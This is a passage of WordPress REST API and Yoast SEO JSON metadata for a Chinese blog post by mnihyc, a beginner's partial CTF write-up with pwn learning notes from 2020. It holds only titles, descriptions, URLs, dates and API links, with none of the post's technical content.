Blog\",\"isPartOf\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#primaryimage\"},\"image\":{\"@id\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#primaryimage\"},\"thumbnailUrl\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png\",\"datePublished\":\"2020-05-04T17:40:15+00:00\",\"dateModified\":\"2020-05-05T09:46:43+00:00\",\"description\":\"\u9760\u7740\u795e\u901a\u5e7f\u5927\u7684\u7fa4\u53cb\u5173\u7cfb\uff08\uff09\u6df7\u8fdb\u4e86 HIT \u7684 CTF \u961f\u62db\u65b0\u6bd4\u8d5b\uff0c\u5b66\u5230\u4e86\u5f88\u591a\u59ff\u52bf\u548c pwn \u7ecf\u9a8c\uff0c\u6545\u5728\u6b64\u8bb0\u5f55\u4e00\u4e0b\u3002 \u840c\u65b0\u83dc\u9e21\u9996\u53d1 CTF\uff0c\u9898\u76ee\u6bd4\u8f83\u7b80\u5355\uff0c\u800c\u4e14\u8fd8\u6ca1\u6709 AK\uff0c\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u6b65\uff08 \u8fd8\u6709 %%%%%% rxz mcfx &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u73af\u5883\u51c6\u5907 pwn -game\",\"breadcrumb\":{\"@id\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#breadcrumb\"},\"inLanguage\":\"zh-Hans\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#primaryimage\",\"url\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png\",\"contentUrl\":\"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"\u9996\u9875\",\"item\":\"https:\/\/mnihyc.com\/blog\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp &#038; \u5b66\u4e60\u7ecf\u9a8c\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/mnihyc.com\/blog\/#website\",\"url\":\"https:\/\/mnihyc.com\/blog\/\",\"name\":\"mnihyc&#039;s Blog\",\"description\":\"Welcome!\",\"publisher\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/mnihyc.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"zh-Hans\"},{\"@type\":[\"Person\",\"Organization\"],\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751\",\"name\":\"mnihyc\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-Hans\",\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g\",\"caption\":\"mnihyc\"},\"logo\":{\"@id\":\"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp & \u5b66\u4e60\u7ecf\u9a8c - mnihyc&#039;s Blog","description":"\u9760\u7740\u795e\u901a\u5e7f\u5927\u7684\u7fa4\u53cb\u5173\u7cfb\uff08\uff09\u6df7\u8fdb\u4e86 HIT \u7684 CTF \u961f\u62db\u65b0\u6bd4\u8d5b\uff0c\u5b66\u5230\u4e86\u5f88\u591a\u59ff\u52bf\u548c pwn \u7ecf\u9a8c\uff0c\u6545\u5728\u6b64\u8bb0\u5f55\u4e00\u4e0b\u3002 \u840c\u65b0\u83dc\u9e21\u9996\u53d1 CTF\uff0c\u9898\u76ee\u6bd4\u8f83\u7b80\u5355\uff0c\u800c\u4e14\u8fd8\u6ca1\u6709 AK\uff0c\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u6b65\uff08 \u8fd8\u6709 %%%%%% rxz mcfx &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u73af\u5883\u51c6\u5907 pwn -game","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473","og_locale":"zh_CN","og_type":"article","og_title":"\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp & \u5b66\u4e60\u7ecf\u9a8c - mnihyc&#039;s Blog","og_description":"\u9760\u7740\u795e\u901a\u5e7f\u5927\u7684\u7fa4\u53cb\u5173\u7cfb\uff08\uff09\u6df7\u8fdb\u4e86 HIT \u7684 CTF \u961f\u62db\u65b0\u6bd4\u8d5b\uff0c\u5b66\u5230\u4e86\u5f88\u591a\u59ff\u52bf\u548c pwn \u7ecf\u9a8c\uff0c\u6545\u5728\u6b64\u8bb0\u5f55\u4e00\u4e0b\u3002 \u840c\u65b0\u83dc\u9e21\u9996\u53d1 CTF\uff0c\u9898\u76ee\u6bd4\u8f83\u7b80\u5355\uff0c\u800c\u4e14\u8fd8\u6ca1\u6709 AK\uff0c\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u6b65\uff08 \u8fd8\u6709 %%%%%% rxz mcfx &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u73af\u5883\u51c6\u5907 pwn -game","og_url":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473","og_site_name":"mnihyc&#039;s Blog","article_published_time":"2020-05-04T17:40:15+00:00","article_modified_time":"2020-05-05T09:46:43+00:00","og_image":[{"url":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png","type":"","width":"","height":""}],"author":"mnihyc","twitter_card":"summary_large_image","twitter_creator":"@mnihyc","twitter_site":"@mnihyc","twitter_misc":{"\u4f5c\u8005":"mnihyc","\u9884\u8ba1\u9605\u8bfb\u65f6\u95f4":"14 \u5206"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#article","isPartOf":{"@id":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473"},"author":{"name":"mnihyc","@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"headline":"\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp &#038; \u5b66\u4e60\u7ecf\u9a8c","datePublished":"2020-05-04T17:40:15+00:00","dateModified":"2020-05-05T09:46:43+00:00","mainEntityOfPage":{"@id":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473"},"wordCount":238,"commentCount":2,"publisher":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"image":{"@id":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#primaryimage"},"thumbnailUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png","articleSection":["\u5b89\u5168"],"inLanguage":"zh-Hans","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/cf.mnihyc.com\/blog\/archives\/1473#respond"]}]},{"@type":"WebPage","@id":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473","url":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473","name":"\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp & \u5b66\u4e60\u7ecf\u9a8c - mnihyc&#039;s Blog","isPartOf":{"@id":"https:\/\/mnihyc.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#primaryimage"},"image":{"@id":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#primaryimage"},"thumbnailUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png","datePublished":"2020-05-04T17:40:15+00:00","dateModified":"2020-05-05T09:46:43+00:00","description":"\u9760\u7740\u795e\u901a\u5e7f\u5927\u7684\u7fa4\u53cb\u5173\u7cfb\uff08\uff09\u6df7\u8fdb\u4e86 HIT \u7684 CTF \u961f\u62db\u65b0\u6bd4\u8d5b\uff0c\u5b66\u5230\u4e86\u5f88\u591a\u59ff\u52bf\u548c pwn \u7ecf\u9a8c\uff0c\u6545\u5728\u6b64\u8bb0\u5f55\u4e00\u4e0b\u3002 \u840c\u65b0\u83dc\u9e21\u9996\u53d1 CTF\uff0c\u9898\u76ee\u6bd4\u8f83\u7b80\u5355\uff0c\u800c\u4e14\u8fd8\u6ca1\u6709 AK\uff0c\u795e\u7287\u8bf7\u81ea\u89c9\u7ed5\u6b65\uff08 \u8fd8\u6709 %%%%%% rxz mcfx &nbsp; &nbsp; &nbsp; \u76ee\u5f55 \u73af\u5883\u51c6\u5907 pwn -game","breadcrumb":{"@id":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#breadcrumb"},"inLanguage":"zh-Hans","potentialAction":[{"@type":"ReadAction","target":["https:\/\/cf.mnihyc.com\/blog\/archives\/1473"]}]},{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#primaryimage","url":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png","contentUrl":"https:\/\/mnihyc.com\/blog\/wp-content\/uploads\/2020\/05\/TMESFQL98IO3L1A7H.png"},{"@type":"BreadcrumbList","@id":"https:\/\/cf.mnihyc.com\/blog\/archives\/1473#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9875","item":"https:\/\/mnihyc.com\/blog"},{"@type":"ListItem","position":2,"name":"\u83dc\u9e21\u9996\u53d1 CTF || \u90e8\u5206 WriteUp &#038; \u5b66\u4e60\u7ecf\u9a8c"}]},{"@type":"WebSite","@id":"https:\/\/mnihyc.com\/blog\/#website","url":"https:\/\/mnihyc.com\/blog\/","name":"mnihyc&#039;s Blog","description":"Welcome!","publisher":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/mnihyc.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-Hans"},{"@type":["Person","Organization"],"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/61e167d6d591fdd20dcfee2cf848a751","name":"mnihyc","image":{"@type":"ImageObject","inLanguage":"zh-Hans","@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8d111f863afc3f98816bc96220f97077d470a96f41088de9f19530fc480f8e72?s=96&d=mm&r=g","caption":"mnihyc"},"logo":{"@id":"https:\/\/mnihyc.com\/blog\/#\/schema\/person\/image\/"}}]}},"_links":{"self":[{"href":"https:\/\/cf.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts\/1473","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cf.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cf.mnihyc.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cf.mnihyc.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cf.mnihyc.com\/blog\/wp-json\/wp\/v2\/comments?post=1473"}],"version-history":[{"count":0,"href":"https:\/\/cf.mnihyc.com\/blog\/wp-json\/wp\/v2\/posts\/1473\/revisions"}],"wp:attachment":[{"href":"https:\/\/cf.mnihyc.com\/blog\/wp-json\/wp\/v2\/media?parent=1473"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cf.mnihyc.com\/blog\/wp-json\/wp\/v2\/categories?post=1473"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cf.mnihyc.com\/blog\/wp-json\/wp\/v2\/tags?post=1473"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}